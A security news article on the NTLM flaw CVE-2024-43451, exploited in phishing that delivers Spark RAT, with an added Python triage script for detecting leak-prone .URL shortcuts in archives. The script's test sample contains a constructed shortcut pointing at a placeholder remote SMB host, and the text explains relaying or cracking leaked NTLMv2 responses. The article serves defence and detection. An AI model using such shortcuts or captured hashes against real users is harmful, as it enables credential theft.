Hackers Exploit Windows NTLM Flaw to Spread RAT Malware

Cybersecurity researchers have discovered that a vulnerability in Windows NT LAN Manager (NTLM), tracked as CVE-2024-43451, has been actively exploited as a zero-day in targeted cyberattacks. The flaw, with a CVSS score of 6.5, was patched by Microsoft earlier this week but had already been abused in attacks linked to a suspected Russian-affiliated threat group.

The vulnerability is a spoofing issue that discloses a user's NTLMv2 hash with minimal interaction: the victim's machine is induced to authenticate to an attacker-controlled server, which captures the NTLM response. According to Microsoft's advisory, selecting the file with a single click, right-clicking to inspect it, or performing other actions short of opening or executing it is enough to trigger the flaw.

Researchers report that the flaw had been exploited since June 2024 in a phishing campaign delivering Spark RAT, an open-source remote access trojan. The attackers staged the malicious files on a legitimate Ukrainian government website, one that issues academic certificates.

The attack begins with phishing emails sent from a compromised Ukrainian government server. The messages tell recipients to renew their academic certificates and carry a booby-trapped link; clicking it downloads a ZIP archive containing a malicious .URL file (a Windows Internet Shortcut).

The exploit fires as soon as the victim interacts with the shortcut: Windows resolves the shortcut's remote target and opens a connection to the attacker's server, which is then used to fetch additional payloads, including Spark RAT. In some cases that connection is an SMB session, and Windows sends the victim's NTLMv2 response during the authentication handshake, handing the attacker material for a pass-the-hash style attack.

Strictly, what leaks over SMB is the NTLMv2 challenge-response (Net-NTLMv2), not the stored NT hash. It cannot simply be replayed the way a classic pass-the-hash attack replays an NT hash, but it can be relayed to another service while the challenge is live or cracked offline to recover the password. Either route lets the attacker act as the user without knowing the password.
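As an added example (not code from the article, from Microsoft, or from the researchers the article cites), the Python script below triages the kind of archive described above: it unpacks a ZIP, finds .URL shortcuts, and flags any URL, IconFile or WorkingDirectory entry that names a remote host through a UNC path or a file:// URL, since those are the fields Explorer may resolve, and authenticate to with NTLM, when the shortcut is selected or inspected rather than opened. The archive, its file names and the 203.0.113.10 address are constructed placeholders, not indicators from the campaign; the internal/external host heuristic is an assumption for illustration.

```python
"""Triage .URL (Internet Shortcut) files in an archive for entries that make
Windows open an outbound SMB/WebDAV session, and so leak an NTLM response.

Added example for this article, not code from the original page or from the
researchers it cites. All sample data below is constructed.
"""
from __future__ import annotations

import configparser
import io
import ipaddress
import re
import zipfile
from urllib.parse import urlparse

# Fields of a .URL file that Explorer may resolve without the user opening
# the shortcut; a remote host in any of them can trigger NTLM authentication.
NETWORK_KEYS = {"url", "iconfile", "workingdirectory"}

# Hosts treated as internal for this triage (assumption: RFC1918, loopback,
# link-local, and unqualified single-label names).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]

# \\host\share... : a UNC path, reached over SMB (TCP 445) with WebDAV fallback.
UNC_RE = re.compile(r"^\\\\([^\\/]+)(?:[\\/]|$)")


def is_internal_host(host: str) -> bool:
    """Heuristic: private/loopback IPs and single-label names count as internal."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "." not in host
    return any(ip in net for net in INTERNAL_NETS)


def extract_targets(url_text: str) -> list[tuple[str, str]]:
    """Return (key, value) pairs for every network-capable key in a .URL file."""
    parser = configparser.ConfigParser(interpolation=None, strict=False,
                                       delimiters=("=",))
    parser.optionxform = str  # keep key case as written in the file
    try:
        parser.read_string(url_text)
    except configparser.Error:
        return []  # not INI-shaped; nothing Explorer would resolve
    return [(key, value.strip())
            for section in parser.sections()
            for key, value in parser.items(section)
            if key.lower() in NETWORK_KEYS]


def classify_target(value: str) -> tuple[str, str] | None:
    """Return (host, reason) if the value names a remote host, else None.
    An ordinary http(s) bookmark target is not flagged: it is the normal
    content of a .URL file and does not by itself cause SMB authentication."""
    m = UNC_RE.match(value)
    if m:
        return m.group(1), "UNC path (SMB, WebDAV fallback)"
    parsed = urlparse(value)
    if parsed.scheme == "file" and parsed.netloc:
        return parsed.netloc, "file:// URL with remote host"
    return None


def triage_zip(zip_bytes: bytes) -> list[dict]:
    """Scan every .url member of an archive and report leak-capable targets."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            if not name.lower().endswith(".url"):
                continue
            text = zf.read(name).decode("utf-8-sig", errors="replace")
            for key, value in extract_targets(text):
                hit = classify_target(value)
                if hit is None:
                    continue
                host, reason = hit
                findings.append({"member": name, "key": key, "host": host,
                                 "reason": reason,
                                 "external": not is_internal_host(host)})
    return findings


def build_sample_archive() -> bytes:
    """Constructed sample: one benign bookmark and one shortcut whose target and
    icon both live on an external host (203.0.113.10 is a documentation
    address, used here as a placeholder)."""
    benign = "[InternetShortcut]\r\nURL=https://example.com/renew\r\nIconIndex=0\r\n"
    suspicious = ("[InternetShortcut]\r\n"
                  "URL=file://203.0.113.10/share/certificate.pdf\r\n"
                  "IconFile=\\\\203.0.113.10\\share\\icon.ico\r\n"
                  "IconIndex=1\r\n")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("renewal.url", benign)
        zf.writestr("certificate.url", suspicious)
    return buf.getvalue()


if __name__ == "__main__":
    for finding in triage_zip(build_sample_archive()):
        print(finding)
```

Run against the constructed archive, the benign bookmark produces nothing while the second shortcut yields two findings, both pointing at the external host, which is exactly the pattern a mail gateway or sandbox should treat as an NTLM-leak attempt rather than an ordinary link.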

CERT-UA has also flagged a parallel campaign that uses tax-themed phishing emails to distribute LiteManager, a legitimate remote desktop tool, for financial theft. Those attacks, attributed to UAC-0050, target accountants and enterprise users of remote banking systems; in reported cases, funds were stolen within an hour of the initial compromise.

To mitigate such risks, organizations should apply the latest patches promptly, this NTLM fix in particular. Because the leak depends on the victim's machine authenticating to an attacker-controlled host, blocking outbound SMB (TCP 445) and WebDAV traffic to the internet at the perimeter, and auditing or restricting outgoing NTLM authentication to remote servers, keeps the hash from leaving the network even if a user touches the file. Mail filtering should treat archives that contain .URL shortcuts as suspicious, and multi-factor authentication and endpoint detection further reduce exposure to phishing campaigns. Training employees to recognize phishing attempts and to avoid interacting with unexpected links and attachments remains essential.